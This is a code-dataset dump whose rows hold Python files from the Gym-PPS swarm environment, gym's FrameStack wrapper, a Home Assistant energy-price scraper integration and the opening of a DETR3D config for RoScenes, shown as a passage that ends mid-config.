id
int64
0
458k
file_name
stringlengths
4
119
file_path
stringlengths
14
227
content
stringlengths
24
9.96M
size
int64
24
9.96M
language
stringclasses
1 value
extension
stringclasses
14 values
total_lines
int64
1
219k
avg_line_length
float64
2.52
4.63M
max_line_length
int64
5
9.91M
alphanum_fraction
float64
0
1
repo_name
stringlengths
7
101
repo_stars
int64
100
139k
repo_forks
int64
0
26.4k
repo_open_issues
int64
0
2.27k
repo_license
stringclasses
12 values
repo_extraction_date
stringclasses
433 values
2,289,400
custom_env.py
WindyLab_Gym-PPS/example_pps/custom_env.py
import gym from gym import spaces import numpy as np """Define your own Observation and Reward in this script: You may use the following properties to define your observation/reward functions: self.env.p, dp, ddp, theta, heading, d_b2b_center, is_collide_b2b, energy """ class MyObs(gym.ObservationWrapper): def __init__(self, env): super().__init__(env) self.observation_space = spaces.Box(shape=(2, env.n_p+env.n_e), low=-np.inf, high=np.inf) def observation(self, obs): r"""Example:: n_pe = self.env.n_p + self.env.n_e obs = np.ones((2, n_pe)) return obs """ return obs class MyReward(gym.RewardWrapper): def reward(self, reward): r"""Example:: reward = np.sum(self.env.is_collide_b2b) """ return reward
852
Python
.py
24
28.458333
97
0.642225
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,401
test_pps.py
WindyLab_Gym-PPS/example_pps/test_pps.py
import os import json import numpy as np import time import gym from gym.wrappers import PredatorPreySwarmCustomizer from custom_env import MyObs, MyReward ## Define the Predator-Prey Swarm (PPS) environment scenario_name = 'PredatorPreySwarm-v0' # customize PPS environment parameters in the .json file custom_param = 'custom_param.json' ## Make the environment env = gym.make(scenario_name) custom_param = os.path.dirname(os.path.realpath(__file__)) + '/' + custom_param env = PredatorPreySwarmCustomizer(env, custom_param) ## If NEEDED, Use the following wrappers to customize observations and reward functions # env = MyReward(MyObs(env)) n_p = env.get_param('n_p') n_e = env.n_e if __name__ == '__main__': s = env.reset() # (obs_dim, n_peo) print(f"Observation space shape is {s.shape} ") for _ in range(1): for step in range(1000): env.render( mode='human' ) # To separately control a_pred = np.random.uniform(-1,1,(2, n_p)) a_prey = np.random.uniform(-1,1,(2, n_e)) a = np.concatenate((a_pred, a_prey), axis=-1) # Sample random actions automatically # a = env.action_space.sample() s_, r, done, info = env.step(a) s = s_.copy()
1,298
Python
.py
33
33.454545
88
0.648281
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,402
custom_param.py
WindyLab_Gym-PPS/example_pps/custom_param.py
''' Specify parameters of the PredatorPreySwarm environment ''' from typing import Union import numpy as np import argparse parser = argparse.ArgumentParser("Gym-PredatorPreySwarm Arguments") parser.add_argument("--n-p", type=int, default=3, help='number of predators') parser.add_argument("--n-e", type=int, default=20, help='number of prey') parser.add_argument("--is-periodic", type=bool, default=False, help='Set whether has wall or periodic boundaries') parser.add_argument("--dynamics-mode", type=str, default='Polar', help=" select one from ['Cartesian', 'Polar']") parser.add_argument("--pursuer-strategy", type=str, default='nearest', help="select one from ['input', 'static', 'random', 'nearest']") parser.add_argument("--escaper-strategy", type=str, default='random', help="select one from ['input', 'static', 'random', 'nearest']") ppsargs = parser.parse_args()
884
Python
.py
14
61.428571
136
0.737875
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,403
generate_json.py
WindyLab_Gym-PPS/scripts/generate_json.py
from gym import envs, spaces, logger import json import os import sys import argparse from gym.envs.tests.spec_list import should_skip_env_spec_for_tests from gym.envs.tests.test_envs_semantics import generate_rollout_hash, hash_object DATA_DIR = os.path.join(os.path.dirname(__file__), os.pardir, "gym", "envs", "tests") ROLLOUT_STEPS = 100 episodes = ROLLOUT_STEPS steps = ROLLOUT_STEPS ROLLOUT_FILE = os.path.join(DATA_DIR, "rollout.json") if not os.path.isfile(ROLLOUT_FILE): logger.info( "No rollout file found. Writing empty json file to {}".format(ROLLOUT_FILE) ) with open(ROLLOUT_FILE, "w") as outfile: json.dump({}, outfile, indent=2) def update_rollout_dict(spec, rollout_dict): """ Takes as input the environment spec for which the rollout is to be generated, and the existing dictionary of rollouts. Returns True iff the dictionary was modified. """ # Skip platform-dependent if should_skip_env_spec_for_tests(spec): logger.info("Skipping tests for {}".format(spec.id)) return False # Skip environments that are nondeterministic if spec.nondeterministic: logger.info("Skipping tests for nondeterministic env {}".format(spec.id)) return False logger.info("Generating rollout for {}".format(spec.id)) try: ( observations_hash, actions_hash, rewards_hash, dones_hash, ) = generate_rollout_hash(spec) except: # If running the env generates an exception, don't write to the rollout file logger.warn( "Exception {} thrown while generating rollout for {}. Rollout not added.".format( sys.exc_info()[0], spec.id ) ) return False rollout = {} rollout["observations"] = observations_hash rollout["actions"] = actions_hash rollout["rewards"] = rewards_hash rollout["dones"] = dones_hash existing = rollout_dict.get(spec.id) if existing: differs = False for key, new_hash in rollout.items(): differs = differs or existing[key] != new_hash if not differs: logger.debug("Hashes match with existing for {}".format(spec.id)) return False else: logger.warn("Got new hash for {}. Overwriting.".format(spec.id)) rollout_dict[spec.id] = rollout return True def add_new_rollouts(spec_ids, overwrite): environments = [ spec for spec in envs.registry.all() if spec.entry_point is not None ] if spec_ids: environments = [spec for spec in environments if spec.id in spec_ids] assert len(environments) == len(spec_ids), "Some specs not found" with open(ROLLOUT_FILE) as data_file: rollout_dict = json.load(data_file) modified = False for spec in environments: if not overwrite and spec.id in rollout_dict: logger.debug("Rollout already exists for {}. Skipping.".format(spec.id)) else: modified = update_rollout_dict(spec, rollout_dict) or modified if modified: logger.info("Writing new rollout file to {}".format(ROLLOUT_FILE)) with open(ROLLOUT_FILE, "w") as outfile: json.dump(rollout_dict, outfile, indent=2, sort_keys=True) else: logger.info("No modifications needed.") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-f", "--force", action="store_true", help="Overwrite " + "existing rollouts if hashes differ.", ) parser.add_argument("-v", "--verbose", action="store_true") parser.add_argument( "specs", nargs="*", help="ids of env specs to check (default: all)" ) args = parser.parse_args() if args.verbose: logger.set_level(logger.INFO) add_new_rollouts(args.specs, args.force)
3,910
Python
.py
102
31.441176
93
0.64996
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,404
lint_python.yml
WindyLab_Gym-PPS/.github/workflows/lint_python.yml
name: lint_python on: [pull_request, push] jobs: lint_python: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - uses: actions/setup-python@v2 - run: pip install isort mypy pytest pyupgrade safety - run: isort --check-only --profile black . || true - run: pip install -e .[nomujoco] - run: mypy --install-types --non-interactive . || true - run: pytest . || true - run: pytest --doctest-modules . || true - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true
544
Python
.pyt
15
31
71
0.620038
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,405
test_frame_stack.py
WindyLab_Gym-PPS/gym/wrappers/test_frame_stack.py
import pytest pytest.importorskip("atari_py") import numpy as np import gym from gym.wrappers import FrameStack try: import lz4 except ImportError: lz4 = None @pytest.mark.parametrize("env_id", ["CartPole-v1", "Pendulum-v0", "Pong-v0"]) @pytest.mark.parametrize("num_stack", [2, 3, 4]) @pytest.mark.parametrize( "lz4_compress", [ pytest.param( True, marks=pytest.mark.skipif( lz4 is None, reason="Need lz4 to run tests with compression" ), ), False, ], ) def test_frame_stack(env_id, num_stack, lz4_compress): env = gym.make(env_id) shape = env.observation_space.shape env = FrameStack(env, num_stack, lz4_compress) assert env.observation_space.shape == (num_stack,) + shape assert env.observation_space.dtype == env.env.observation_space.dtype obs = env.reset() obs = np.asarray(obs) assert obs.shape == (num_stack,) + shape for i in range(1, num_stack): assert np.allclose(obs[i - 1], obs[i]) obs, _, _, _ = env.step(env.action_space.sample()) obs = np.asarray(obs) assert obs.shape == (num_stack,) + shape for i in range(1, num_stack - 1): assert np.allclose(obs[i - 1], obs[i]) assert not np.allclose(obs[-1], obs[-2]) obs, _, _, _ = env.step(env.action_space.sample()) assert len(obs) == num_stack
1,387
Python
.tac
42
27.642857
77
0.632012
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,406
frame_stack.py
WindyLab_Gym-PPS/gym/wrappers/frame_stack.py
from collections import deque import numpy as np from gym.spaces import Box from gym import ObservationWrapper class LazyFrames(object): r"""Ensures common frames are only stored once to optimize memory use. To further reduce the memory use, it is optionally to turn on lz4 to compress the observations. .. note:: This object should only be converted to numpy array just before forward pass. Args: lz4_compress (bool): use lz4 to compress the frames internally """ __slots__ = ("frame_shape", "dtype", "shape", "lz4_compress", "_frames") def __init__(self, frames, lz4_compress=False): self.frame_shape = tuple(frames[0].shape) self.shape = (len(frames),) + self.frame_shape self.dtype = frames[0].dtype if lz4_compress: from lz4.block import compress frames = [compress(frame) for frame in frames] self._frames = frames self.lz4_compress = lz4_compress def __array__(self, dtype=None): arr = self[:] if dtype is not None: return arr.astype(dtype) return arr def __len__(self): return self.shape[0] def __getitem__(self, int_or_slice): if isinstance(int_or_slice, int): return self._check_decompress(self._frames[int_or_slice]) # single frame return np.stack( [self._check_decompress(f) for f in self._frames[int_or_slice]], axis=0 ) def __eq__(self, other): return self.__array__() == other def _check_decompress(self, frame): if self.lz4_compress: from lz4.block import decompress return np.frombuffer(decompress(frame), dtype=self.dtype).reshape( self.frame_shape ) return frame class FrameStack(ObservationWrapper): r"""Observation wrapper that stacks the observations in a rolling manner. For example, if the number of stacks is 4, then the returned observation contains the most recent 4 observations. For environment 'Pendulum-v0', the original observation is an array with shape [3], so if we stack 4 observations, the processed observation has shape [4, 3]. .. note:: To be memory efficient, the stacked observations are wrapped by :class:`LazyFrame`. .. note:: The observation space must be `Box` type. If one uses `Dict` as observation space, it should apply `FlattenDictWrapper` at first. Example:: >>> import gym >>> env = gym.make('PongNoFrameskip-v0') >>> env = FrameStack(env, 4) >>> env.observation_space Box(4, 210, 160, 3) Args: env (Env): environment object num_stack (int): number of stacks lz4_compress (bool): use lz4 to compress the frames internally """ def __init__(self, env, num_stack, lz4_compress=False): super(FrameStack, self).__init__(env) self.num_stack = num_stack self.lz4_compress = lz4_compress self.frames = deque(maxlen=num_stack) low = np.repeat(self.observation_space.low[np.newaxis, ...], num_stack, axis=0) high = np.repeat( self.observation_space.high[np.newaxis, ...], num_stack, axis=0 ) self.observation_space = Box( low=low, high=high, dtype=self.observation_space.dtype ) def observation(self): assert len(self.frames) == self.num_stack, (len(self.frames), self.num_stack) return LazyFrames(list(self.frames), self.lz4_compress) def step(self, action): observation, reward, done, info = self.env.step(action) self.frames.append(observation) return self.observation(), reward, done, info def reset(self, **kwargs): observation = self.env.reset(**kwargs) [self.frames.append(observation) for _ in range(self.num_stack)] return self.observation()
3,939
Python
.tac
90
35.611111
91
0.641865
WindyLab/Gym-PPS
8
2
1
GPL-2.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,407
sensor.py
TeDeVPrime_energy_grabber_by_ted/sensor.py
import logging from datetime import timedelta, datetime from bs4 import BeautifulSoup from homeassistant.components.sensor import SensorEntity from homeassistant.core import callback from homeassistant.helpers.aiohttp_client import async_get_clientsession from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed from .const import DOMAIN, CONF_URL from homeassistant.helpers.dispatcher import async_dispatcher_connect, async_dispatcher_send _LOGGER = logging.getLogger(__name__) SCAN_INTERVAL = timedelta(hours=6) async def async_setup_entry(hass, entry, async_add_entities): """Set up the sensor from a config entry.""" url = entry.data[CONF_URL] name = entry.data.get('name', 'Energy Price') monthly_fee = entry.data.get('monthly_fee', 0.0) coordinator = DataUpdateCoordinator( hass, _LOGGER, name="sensor", update_method=lambda: fetch_energy_price(hass, url), update_interval=SCAN_INTERVAL, ) # Fetch initial data so we have data when entities subscribe await coordinator.async_refresh() # Setup the energy price sensor and the monthly fee sensor async_add_entities([ EnergyPriceSensor(name, coordinator, entry.entry_id), MonthlyFeeSensor(name + " Monthly Fee", monthly_fee, entry.entry_id, hass) ], True) class EnergyPriceSensor(SensorEntity): """Representation of a Sensor.""" def __init__(self, name, coordinator, entry_id): """Initialize the sensor.""" self._name = name self.coordinator = coordinator self._entry_id = entry_id @property def unique_id(self): """Return a unique ID to use for this sensor.""" return f"{self._entry_id}_energy_price" @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.coordinator.data @property def unit_of_measurement(self): """Return the unit of measurement.""" return "EUR/kWh" @property def available(self): """Return if sensor is available.""" return self.coordinator.last_update_success @property def state_class(self): """Return the state class of the sensor.""" return 'measurement' @property def icon(self): """Return the icon to be used for this sensor.""" return "mdi:currency-eur" async def async_update(self): """Update the sensor.""" await self.coordinator.async_request_refresh() class MonthlyFeeSensor(SensorEntity): """Representation of a Monthly Fee Sensor.""" def __init__(self, name, monthly_fee, entry_id, hass): """Initialize the monthly fee sensor.""" self._name = name self._monthly_fee = monthly_fee self._entry_id = entry_id self.hass = hass @property def unique_id(self): """Return a unique ID to use for this sensor.""" return f"{self._entry_id}_monthly_fee" @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._monthly_fee @property def unit_of_measurement(self): """Return the unit of measurement.""" return "EUR" @property def icon(self): """Return the icon to be used for this sensor.""" return "mdi:currency-eur" async def fetch_energy_price(hass, url): """Fetch the energy price from a specific URL using aiohttp.""" session = async_get_clientsession(hass) try: async with session.get(url) as response: response.raise_for_status() text = await response.text() soup = BeautifulSoup(text, 'html.parser') table = soup.find('table', class_='whoplaystable') if not table: raise UpdateFailed("Table with class 'whoplaystable' not found.") rows = table.find_all('tr', class_='linecolor1') if not rows: raise UpdateFailed("No rows with class 'linecolor1' found.") for row in rows: cells = row.find_all('td', class_='evtd_numeric') if cells: struck_text = cells[0].find('s') if struck_text: # Remove the struck text from the price if it exists price_text = cells[0].text.replace(struck_text.text, '').strip() else: price_text = cells[0].text.strip() # Clean the price text and convert it to a float price_text = price_text.replace('€', '').replace('$', '').replace(',', '.').strip() try: price_float = float(price_text) return price_float except ValueError: _LOGGER.error("Non-numeric price data found: %s", price_text) continue # If non-numeric, continue with next row raise UpdateFailed("Price data not found in rows") except Exception as e: _LOGGER.error(f"Error fetching data from {url}: {str(e)}") raise UpdateFailed from e
5,407
Python
.py
131
32.137405
105
0.61974
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,408
config_flow.py
TeDeVPrime_energy_grabber_by_ted/config_flow.py
import voluptuous as vol from homeassistant import config_entries from homeassistant.core import HomeAssistant from homeassistant.const import CONF_NAME, CONF_URL from homeassistant.helpers.aiohttp_client import async_get_clientsession from .const import DOMAIN, CONF_URL import logging _LOGGER = logging.getLogger(__name__) class GreekEnergyPricesConfigFlow(config_entries.ConfigFlow, domain=DOMAIN): """Handle a config flow for Energy Grabber by Ted - EGT Monitor.""" VERSION = 1 CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL @staticmethod @config_entries.HANDLERS.register(DOMAIN) def async_get_options_flow(config_entry): return OptionsFlow(config_entry) async def async_step_user(self, user_input=None): """Manage the configuration from the user input.""" errors = {} if user_input is not None: url = user_input.get(CONF_URL) friendly_name = user_input.get(CONF_NAME, "Default Friendly Name") monthly_fee = user_input.get('monthly_fee') if await self._test_url(url): # If the URL is valid, create the config entry return self.async_create_entry(title=friendly_name, data={CONF_URL: url, CONF_NAME: friendly_name, 'monthly_fee': monthly_fee}) else: errors['base'] = 'invalid_url' return self.async_show_form( step_id="user", data_schema=vol.Schema({ vol.Required(CONF_URL, description="URL of the Energy Price Source"): str, vol.Required(CONF_NAME, default="Friendly Name for the sensor", description="Friendly Name for the Sensor"): str, vol.Required('monthly_fee', default=5.0): vol.All(vol.Coerce(float), vol.Range(min=0)) }), errors=errors, description_placeholders={ 'URL': 'Enter the URL to fetch the energy prices from', 'Friendly Name': 'Enter a name for this sensor in Home Assistant', 'Monthly Fee': 'Enter the monthly fee from your provider chosen package.' } ) async def _test_url(self, url): """Test the URL to see if it can be accessed successfully.""" session = async_get_clientsession(self.hass) try: async with session.get(url, timeout=10) as response: response.raise_for_status() return True except Exception as e: _LOGGER.error(f"Error accessing URL: {url}, Error: {str(e)}") return False class OptionsFlow(config_entries.OptionsFlow): def __init__(self, config_entry): self.config_entry = config_entry async def async_step_init(self, user_input=None): """Manage the options.""" if user_input is not None: return self.async_create_entry(title="", data=user_input) return self.async_show_form( step_id="init", data_schema=vol.Schema({ vol.Required('monthly_fee', default=self.config_entry.options.get('monthly_fee', 0.0)): vol.All(vol.Coerce(float), vol.Range(min=0)) }) )
3,196
Python
.py
65
39.076923
148
0.633333
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,409
const.py
TeDeVPrime_energy_grabber_by_ted/const.py
# Constants file for Greek Energy Prices Monitor DOMAIN = "energy_grabber_by_ted" CONF_URL = 'url' # This is the configuration key for URL used in the config flow and sensor setup
181
Python
.py
3
59.333333
98
0.775281
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,410
__init__.py
TeDeVPrime_energy_grabber_by_ted/__init__.py
from homeassistant.core import HomeAssistant from homeassistant import config_entries from homeassistant.helpers.dispatcher import async_dispatcher_send import logging from .const import DOMAIN, CONF_URL _LOGGER = logging.getLogger(__name__) async def async_setup(hass: HomeAssistant, config: dict): """Set up the Energy Grabber by Ted - EGT component from configuration.yaml (if any).""" return True async def async_setup_entry(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Set up Energy Grabber by Ted - EGT from a config entry.""" hass.data.setdefault(DOMAIN, {}) hass.data[DOMAIN][entry.entry_id] = { 'data': entry.data, 'update_listener': entry.add_update_listener(async_update_options) } try: await hass.config_entries.async_forward_entry_setup(entry, 'sensor') _LOGGER.info(f"Energy Grabber by Ted - EGT integration loaded for {entry.title}") return True except Exception as e: _LOGGER.error(f"Failed to set up Energy Grabber by Ted - EGT integration: {str(e)}", exc_info=True) return False async def async_unload_entry(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Unload a config entry.""" unload_ok = await hass.config_entries.async_forward_entry_unload(entry, 'sensor') if unload_ok: hass.data[DOMAIN].pop(entry.entry_id) _LOGGER.info(f"Energy Grabber by Ted - EGT integration unloaded for {entry.title}") return unload_ok async def update_listener(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Handle options update.""" _LOGGER.debug(f"Listener triggered for update on {entry.entry_id}") async_dispatcher_send(hass, f"{DOMAIN}_{entry.entry_id}_data_updated") async def async_update_options(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Handle options update.""" _LOGGER.debug(f"Updating options for entry {entry.entry_id}") hass.data[DOMAIN][entry.entry_id]['data'] = entry.data async_dispatcher_send(hass, f"{DOMAIN}_{entry.entry_id}_data_updated") _LOGGER.debug("Dispatcher signal sent for config entry update")
2,142
Python
.py
40
48.55
107
0.726839
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,411
sensor.py
TeDeVPrime_energy_grabber_by_ted/custom_components/energy_grabber_by_ted/sensor.py
import logging from datetime import timedelta, datetime from bs4 import BeautifulSoup from homeassistant.components.sensor import SensorEntity from homeassistant.core import callback from homeassistant.helpers.aiohttp_client import async_get_clientsession from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed from .const import DOMAIN, CONF_URL from homeassistant.helpers.dispatcher import async_dispatcher_connect, async_dispatcher_send _LOGGER = logging.getLogger(__name__) SCAN_INTERVAL = timedelta(hours=6) async def async_setup_entry(hass, entry, async_add_entities): """Set up the sensor from a config entry.""" url = entry.data[CONF_URL] name = entry.data.get('name', 'Energy Price') monthly_fee = entry.data.get('monthly_fee', 0.0) coordinator = DataUpdateCoordinator( hass, _LOGGER, name="sensor", update_method=lambda: fetch_energy_price(hass, url), update_interval=SCAN_INTERVAL, ) # Fetch initial data so we have data when entities subscribe await coordinator.async_refresh() # Setup the energy price sensor and the monthly fee sensor async_add_entities([ EnergyPriceSensor(name, coordinator, entry.entry_id), MonthlyFeeSensor(name + " Monthly Fee", monthly_fee, entry.entry_id, hass) ], True) class EnergyPriceSensor(SensorEntity): """Representation of a Sensor.""" def __init__(self, name, coordinator, entry_id): """Initialize the sensor.""" self._name = name self.coordinator = coordinator self._entry_id = entry_id @property def unique_id(self): """Return a unique ID to use for this sensor.""" return f"{self._entry_id}_energy_price" @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self.coordinator.data @property def unit_of_measurement(self): """Return the unit of measurement.""" return "EUR/kWh" @property def available(self): """Return if sensor is available.""" return self.coordinator.last_update_success @property def state_class(self): """Return the state class of the sensor.""" return 'measurement' @property def icon(self): """Return the icon to be used for this sensor.""" return "mdi:currency-eur" async def async_update(self): """Update the sensor.""" await self.coordinator.async_request_refresh() class MonthlyFeeSensor(SensorEntity): """Representation of a Monthly Fee Sensor.""" def __init__(self, name, monthly_fee, entry_id, hass): """Initialize the monthly fee sensor.""" self._name = name self._monthly_fee = monthly_fee self._entry_id = entry_id self.hass = hass @property def unique_id(self): """Return a unique ID to use for this sensor.""" return f"{self._entry_id}_monthly_fee" @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._monthly_fee @property def unit_of_measurement(self): """Return the unit of measurement.""" return "EUR" @property def icon(self): """Return the icon to be used for this sensor.""" return "mdi:currency-eur" async def fetch_energy_price(hass, url): """Fetch the energy price from a specific URL using aiohttp.""" session = async_get_clientsession(hass) try: async with session.get(url) as response: response.raise_for_status() text = await response.text() soup = BeautifulSoup(text, 'html.parser') table = soup.find('table', class_='whoplaystable') if not table: raise UpdateFailed("Table with class 'whoplaystable' not found.") rows = table.find_all('tr', class_='linecolor1') if not rows: raise UpdateFailed("No rows with class 'linecolor1' found.") for row in rows: cells = row.find_all('td', class_='evtd_numeric') if cells: struck_text = cells[0].find('s') if struck_text: # Remove the struck text from the price if it exists price_text = cells[0].text.replace(struck_text.text, '').strip() else: price_text = cells[0].text.strip() # Clean the price text and convert it to a float price_text = price_text.replace('€', '').replace('$', '').replace(',', '.').strip() try: price_float = float(price_text) return price_float except ValueError: _LOGGER.error("Non-numeric price data found: %s", price_text) continue # If non-numeric, continue with next row raise UpdateFailed("Price data not found in rows") except Exception as e: _LOGGER.error(f"Error fetching data from {url}: {str(e)}") raise UpdateFailed from e
5,407
Python
.py
131
32.137405
105
0.61974
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,412
config_flow.py
TeDeVPrime_energy_grabber_by_ted/custom_components/energy_grabber_by_ted/config_flow.py
import voluptuous as vol from homeassistant import config_entries from homeassistant.core import HomeAssistant from homeassistant.const import CONF_NAME, CONF_URL from homeassistant.helpers.aiohttp_client import async_get_clientsession from .const import DOMAIN, CONF_URL import logging _LOGGER = logging.getLogger(__name__) class GreekEnergyPricesConfigFlow(config_entries.ConfigFlow, domain=DOMAIN): """Handle a config flow for Energy Grabber by Ted - EGT Monitor.""" VERSION = 1 CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL @staticmethod @config_entries.HANDLERS.register(DOMAIN) def async_get_options_flow(config_entry): return OptionsFlow(config_entry) async def async_step_user(self, user_input=None): """Manage the configuration from the user input.""" errors = {} if user_input is not None: url = user_input.get(CONF_URL) friendly_name = user_input.get(CONF_NAME, "Default Friendly Name") monthly_fee = user_input.get('monthly_fee') if await self._test_url(url): # If the URL is valid, create the config entry return self.async_create_entry(title=friendly_name, data={CONF_URL: url, CONF_NAME: friendly_name, 'monthly_fee': monthly_fee}) else: errors['base'] = 'invalid_url' return self.async_show_form( step_id="user", data_schema=vol.Schema({ vol.Required(CONF_URL, description="URL of the Energy Price Source"): str, vol.Required(CONF_NAME, default="Friendly Name for the sensor", description="Friendly Name for the Sensor"): str, vol.Required('monthly_fee', default=5.0): vol.All(vol.Coerce(float), vol.Range(min=0)) }), errors=errors, description_placeholders={ 'URL': 'Enter the URL to fetch the energy prices from', 'Friendly Name': 'Enter a name for this sensor in Home Assistant', 'Monthly Fee': 'Enter the monthly fee from your provider chosen package.' } ) async def _test_url(self, url): """Test the URL to see if it can be accessed successfully.""" session = async_get_clientsession(self.hass) try: async with session.get(url, timeout=10) as response: response.raise_for_status() return True except Exception as e: _LOGGER.error(f"Error accessing URL: {url}, Error: {str(e)}") return False class OptionsFlow(config_entries.OptionsFlow): def __init__(self, config_entry): self.config_entry = config_entry async def async_step_init(self, user_input=None): """Manage the options.""" if user_input is not None: return self.async_create_entry(title="", data=user_input) return self.async_show_form( step_id="init", data_schema=vol.Schema({ vol.Required('monthly_fee', default=self.config_entry.options.get('monthly_fee', 0.0)): vol.All(vol.Coerce(float), vol.Range(min=0)) }) )
3,196
Python
.py
65
39.076923
148
0.633333
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,413
const.py
TeDeVPrime_energy_grabber_by_ted/custom_components/energy_grabber_by_ted/const.py
# Constants file for Greek Energy Prices Monitor DOMAIN = "energy_grabber_by_ted" CONF_URL = 'url' # This is the configuration key for URL used in the config flow and sensor setup
181
Python
.py
3
59.333333
98
0.775281
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,414
__init__.py
TeDeVPrime_energy_grabber_by_ted/custom_components/energy_grabber_by_ted/__init__.py
from homeassistant.core import HomeAssistant from homeassistant import config_entries from homeassistant.helpers.dispatcher import async_dispatcher_send import logging from .const import DOMAIN, CONF_URL _LOGGER = logging.getLogger(__name__) async def async_setup(hass: HomeAssistant, config: dict): """Set up the Energy Grabber by Ted - EGT component from configuration.yaml (if any).""" return True async def async_setup_entry(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Set up Energy Grabber by Ted - EGT from a config entry.""" hass.data.setdefault(DOMAIN, {}) hass.data[DOMAIN][entry.entry_id] = { 'data': entry.data, 'update_listener': entry.add_update_listener(async_update_options) } try: await hass.config_entries.async_forward_entry_setup(entry, 'sensor') _LOGGER.info(f"Energy Grabber by Ted - EGT integration loaded for {entry.title}") return True except Exception as e: _LOGGER.error(f"Failed to set up Energy Grabber by Ted - EGT integration: {str(e)}", exc_info=True) return False async def async_unload_entry(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Unload a config entry.""" unload_ok = await hass.config_entries.async_forward_entry_unload(entry, 'sensor') if unload_ok: hass.data[DOMAIN].pop(entry.entry_id) _LOGGER.info(f"Energy Grabber by Ted - EGT integration unloaded for {entry.title}") return unload_ok async def update_listener(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Handle options update.""" _LOGGER.debug(f"Listener triggered for update on {entry.entry_id}") async_dispatcher_send(hass, f"{DOMAIN}_{entry.entry_id}_data_updated") async def async_update_options(hass: HomeAssistant, entry: config_entries.ConfigEntry): """Handle options update.""" _LOGGER.debug(f"Updating options for entry {entry.entry_id}") hass.data[DOMAIN][entry.entry_id]['data'] = entry.data async_dispatcher_send(hass, f"{DOMAIN}_{entry.entry_id}_data_updated") _LOGGER.debug("Dispatcher signal sent for config entry update")
2,142
Python
.py
40
48.55
107
0.726839
TeDeVPrime/energy_grabber_by_ted
8
1
0
GPL-3.0
9/5/2024, 10:48:35 PM (Europe/Amsterdam)
2,289,415
detr3d_roscene_res101.py
roscenes_RoScenes/examples/mmdet3d/configs/detr3d_roscene_res101.py
_base_ = [ '/mmdetection3d/configs/_base_/datasets/nus-3d.py', '/mmdetection3d/configs/_base_/default_runtime.py' ] plugin=True plugin_dir='projects/mmdet3d_plugin/' # If point cloud range is changed, the models should also change their point # cloud range accordingly point_cloud_range = [-400., -40., -0., 400., 40., 6.] voxel_size = [0.2, 0.2, 6] img_norm_cfg = dict( mean=[103.530, 116.280, 123.675], std=[57.375, 57.120, 58.395], to_rgb=False) # For nuScenes we usually do 10-class detection class_names = [ "other", "truck", "bus", "van", "car", ] input_modality = dict( use_lidar=False, use_camera=True, use_radar=False, use_map=False, use_external=True) num_gpus = 8 batch_size = 1 num_iters_per_epoch = 102180 // (num_gpus * batch_size) num_epochs = 12 model = dict( type='Detr3D', use_grid_mask=True, img_backbone=dict( pretrained='torchvision://resnet101', type='ResNet', depth=101, num_stages=4, out_indices=(2, 3), frozen_stages=1, norm_cfg=dict(type='BN', requires_grad=True), norm_eval=True, with_cp=True, style='caffe', dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False), # original DCNv2 will print log when perform load_state_dict stage_with_dcn=(False, False, True, True)), img_neck=dict( type='FPN', in_channels=[1024, 2048], out_channels=256, start_level=1, num_outs=2), pts_bbox_head=dict( type='Detr3DHead', num_query=900, num_classes=len(class_names), in_channels=256, sync_cls_avg_factor=True, with_box_refine=True, as_two_stage=False, code_weights=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.2, 0.2], transformer=dict( type='Detr3DTransformer', decoder=dict( type='Detr3DTransformerDecoder', num_layers=6, return_intermediate=True, transformerlayers=dict( type='DetrTransformerDecoderLayer', attn_cfgs=[ dict( type='MultiheadAttention', embed_dims=256, num_heads=8, dropout=0.1), dict( type='Detr3DCrossAtten', pc_range=point_cloud_range, # same with backbone output levels num_levels=2, num_points=1, embed_dims=256) ], 